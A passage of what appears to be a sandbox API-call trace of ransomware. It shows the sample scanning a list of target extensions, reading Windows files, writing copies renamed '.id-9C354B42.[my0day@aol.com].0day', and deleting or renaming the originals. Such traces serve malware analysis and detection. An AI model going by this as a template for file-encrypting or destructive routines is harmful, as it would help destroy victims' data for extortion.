-1 [0055.986] lstrlenW (lpString=".docx") returned 5 [0055.986] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.986] lstrlenW (lpString=".pdf") returned 4 [0055.986] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.986] lstrlenW (lpString=".xls") returned 4 [0055.986] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.986] lstrlenW (lpString=".xlsx") returned 5 [0055.986] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.986] lstrlenW (lpString=".ppt") returned 4 [0055.986] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.986] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.987] lstrlenW (lpString=".zip") returned 4 [0055.987] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.987] lstrlenW (lpString=".rar") returned 4 [0055.987] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.987] lstrlenW (lpString=".bz2") returned 4 [0055.987] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.987] lstrlenW (lpString=".7z") returned 3 [0055.987] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.987] lstrlenW (lpString=".dbf") returned 4 [0055.987] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.987] lstrlenW (lpString=".1cd") returned 4 [0055.987] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.987] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 72 [0055.987] lstrlenW (lpString=".jpg") returned 4 [0055.987] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.987] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.987] lstrlenW (lpString="TipRes.dll.mui") returned 14 [0055.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.987] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=32768) returned 1 [0055.987] CloseHandle (hObject=0x170) returned 1 [0055.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui")) returned 0x20 [0055.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.988] lstrlenW (lpString=".doc") returned 4 [0055.988] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.988] lstrlenW (lpString=".docx") returned 5 [0055.988] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.988] lstrlenW (lpString=".pdf") returned 4 [0055.988] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.988] lstrlenW (lpString=".xls") returned 4 [0055.988] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.988] lstrlenW (lpString=".xlsx") returned 5 [0055.988] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.988] lstrlenW (lpString=".ppt") returned 4 [0055.988] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.988] lstrlenW (lpString=".zip") returned 4 [0055.988] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.988] lstrlenW (lpString=".rar") returned 4 [0055.988] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.988] lstrlenW (lpString=".bz2") returned 4 [0055.988] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.988] lstrlenW (lpString=".7z") returned 3 [0055.988] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.988] lstrlenW (lpString=".dbf") returned 4 [0055.988] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.988] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString=".1cd") returned 4 [0055.989] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString=".jpg") returned 4 [0055.989] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString=".doc") returned 4 [0055.989] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.989] lstrlenW (lpString=".docx") returned 5 [0055.989] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.989] lstrlenW (lpString=".pdf") returned 4 [0055.989] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.989] lstrlenW (lpString=".xls") returned 4 [0055.989] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.989] lstrlenW (lpString=".xlsx") returned 5 [0055.989] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.989] lstrlenW (lpString=".ppt") returned 4 [0055.989] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString=".zip") returned 4 [0055.989] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.989] lstrlenW (lpString=".rar") returned 4 [0055.989] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.989] lstrlenW (lpString=".bz2") returned 4 [0055.989] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.989] lstrlenW (lpString=".7z") returned 3 [0055.989] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString=".dbf") returned 4 [0055.989] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.989] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.989] lstrlenW (lpString=".1cd") returned 4 [0055.989] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 71 [0055.990] lstrlenW (lpString=".jpg") returned 4 [0055.990] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.990] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.990] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0055.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.990] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=3584) returned 1 [0055.990] CloseHandle (hObject=0x170) returned 1 [0055.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui")) returned 0x20 [0055.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0055.990] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0055.990] lstrlenW (lpString=".doc") returned 4 [0055.990] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.990] lstrlenW (lpString=".docx") returned 5 [0055.990] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.991] lstrlenW (lpString=".pdf") returned 4 [0055.991] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.991] lstrlenW (lpString=".xls") returned 4 [0055.991] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.991] lstrlenW (lpString=".xlsx") returned 5 [0055.991] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.991] lstrlenW (lpString=".ppt") returned 4 [0055.991] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0055.991] lstrlenW (lpString=".zip") returned 4 [0055.991] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.991] lstrlenW (lpString=".rar") returned 4 [0055.991] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.991] lstrlenW (lpString=".bz2") returned 4 [0055.991] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.991] lstrlenW (lpString=".7z") returned 3 [0055.991] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.991] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 72 [0055.991] lstrlenW (lpString=".dbf") returned 4 [0055.991] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.995] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0056.001] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0056.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0056.441] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.441] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.442] GetLastError () returned 0x0 [0056.442] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x665a0, lpOverlapped=0x0) returned 1 [0056.450] WriteFile (in: hFile=0x17c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x665b0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x665b0, lpOverlapped=0x0) returned 1 [0056.456] ReadFile (in: hFile=0x1fc, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.457] WriteFile (in: hFile=0x17c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0056.457] SetEndOfFile (hFile=0x17c) returned 1 [0056.457] CloseHandle (hObject=0x17c) returned 1 [0056.457] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.457] SetEndOfFile (hFile=0x1fc) returned 1 [0056.460] CloseHandle (hObject=0x1fc) returned 1 [0056.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.461] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll")) returned 1 [0056.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.461] lstrlenW (lpString=".doc") returned 4 [0056.461] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.461] lstrlenW (lpString=".docx") returned 5 [0056.461] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0056.461] lstrlenW (lpString=".pdf") returned 4 [0056.461] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.461] lstrlenW (lpString=".xls") returned 4 [0056.461] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.461] lstrlenW (lpString=".xlsx") returned 5 [0056.461] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0056.461] lstrlenW (lpString=".ppt") returned 4 [0056.461] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString=".zip") returned 4 [0056.462] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString=".rar") returned 4 [0056.462] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString=".bz2") returned 4 [0056.462] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.462] lstrlenW (lpString=".7z") returned 3 [0056.462] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString=".dbf") returned 4 [0056.462] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString=".1cd") returned 4 [0056.462] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString=".jpg") returned 4 [0056.462] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString=".doc") returned 4 [0056.462] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString=".docx") returned 5 [0056.462] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0056.462] lstrlenW (lpString=".pdf") returned 4 [0056.462] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString=".xls") returned 4 [0056.462] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString=".xlsx") returned 5 [0056.462] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0056.462] lstrlenW (lpString=".ppt") returned 4 [0056.462] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.462] lstrlenW (lpString=".zip") returned 4 [0056.463] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.463] lstrlenW (lpString=".rar") returned 4 [0056.463] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.463] lstrlenW (lpString=".bz2") returned 4 [0056.463] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.463] lstrlenW (lpString=".7z") returned 3 [0056.463] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.463] lstrlenW (lpString=".dbf") returned 4 [0056.463] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.463] lstrlenW (lpString=".1cd") returned 4 [0056.463] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0056.463] lstrlenW (lpString=".jpg") returned 4 [0056.463] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.463] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0056.463] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0056.463] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.464] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=26624) returned 1 [0056.464] CloseHandle (hObject=0x1fc) returned 1 [0056.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20 [0056.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.464] lstrlenW (lpString=".doc") returned 4 [0056.464] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.464] lstrlenW (lpString=".docx") returned 5 [0056.464] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0056.464] lstrlenW (lpString=".pdf") returned 4 [0056.464] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.464] lstrlenW (lpString=".xls") returned 4 [0056.464] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.464] lstrlenW (lpString=".xlsx") returned 5 [0056.464] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0056.464] lstrlenW (lpString=".ppt") returned 4 [0056.464] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.464] lstrlenW (lpString=".zip") returned 4 [0056.464] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.464] lstrlenW (lpString=".rar") returned 4 [0056.464] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.465] lstrlenW (lpString=".bz2") returned 4 [0056.465] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.465] lstrlenW (lpString=".7z") returned 3 [0056.465] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.465] lstrlenW (lpString=".dbf") returned 4 [0056.465] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.465] lstrlenW (lpString=".1cd") returned 4 [0056.465] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.465] lstrlenW (lpString=".jpg") returned 4 [0056.465] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.465] lstrlenW (lpString=".doc") returned 4 [0056.465] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.465] lstrlenW (lpString=".docx") returned 5 [0056.465] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0056.465] lstrlenW (lpString=".pdf") returned 4 [0056.465] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.465] lstrlenW (lpString=".xls") returned 4 [0056.465] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.465] lstrlenW (lpString=".xlsx") returned 5 [0056.465] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0056.465] lstrlenW (lpString=".ppt") returned 4 [0056.465] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.465] lstrlenW (lpString=".zip") returned 4 [0056.465] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.465] lstrlenW (lpString=".rar") returned 4 [0056.465] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.465] lstrlenW (lpString=".bz2") returned 4 [0056.466] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.466] lstrlenW (lpString=".7z") returned 3 [0056.466] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.466] lstrlenW (lpString=".dbf") returned 4 [0056.466] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.466] lstrlenW (lpString=".1cd") returned 4 [0056.466] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0056.466] lstrlenW (lpString=".jpg") returned 4 [0056.466] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.466] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0056.466] lstrlenW (lpString="msinfo32.exe") returned 12 [0056.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.466] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=378880) returned 1 [0056.466] CloseHandle (hObject=0x1fc) returned 1 [0056.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe")) returned 0x20 [0056.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 